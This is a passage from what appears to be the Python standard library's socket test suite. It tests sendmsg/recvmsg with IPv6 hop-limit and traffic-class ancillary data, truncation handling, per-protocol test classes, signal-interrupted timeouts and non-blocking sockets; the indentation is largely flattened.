self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
    @testSecondCmsgTruncInData.client_skip
    def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
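# Illustrative sketch (not part of the test suite): decoding a single integer
# ancillary item (such as IPV6_HOPLIMIT or IPV6_TCLASS) the same way the
# RFC 3542 tests above do.  Nothing in this module calls it.
def _example_decode_int_cmsg(cmsg_data):
    # The payload is one C int in host byte order.
    a = array.array("i")
    a.frombytes(cmsg_data[:SIZEOF_INT])
    return a[0]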
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
            super().testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
            super().testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
    # Base class for interrupted send/receive tests.  Installs a SIGALRM
    # handler that raises ZeroDivisionError (so that an interrupted call
    # surfaces as that exception) and removes it on teardown, along with
    # any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
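# Illustrative sketch (not part of the test suite): how a SIGALRM handler that
# raises makes the exception surface out of a blocking socket call, which is
# what the Interrupted*TimeoutTest classes below rely on.  Assumes a POSIX
# platform with signal.setitimer(); nothing in this module calls it.
def _example_interrupt_blocking_recv(sock, delay=0.05):
    old_handler = signal.signal(signal.SIGALRM, lambda signum, frame: 1 / 0)
    try:
        signal.setitimer(signal.ITIMER_REAL, delay)
        try:
            sock.recv(1024)          # blocks until the alarm fires
        except ZeroDivisionError:
            return True              # the handler's exception surfaced here
        return False
    finally:
        signal.setitimer(signal.ITIMER_REAL, 0)
        signal.signal(signal.SIGALRM, old_handler)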
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises ZeroDivisionError,
        # propagated from the SIGALRM handler, when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises
        # ZeroDivisionError, propagated from the SIGALRM handler, when
        # interrupted by a signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
        # We pass an actual address here because Python's wrapper for
        # sendto() doesn't allow passing a zero-length one; POSIX requires
        # that the address be ignored anyway, since the socket is
        # connection-mode.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EAGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
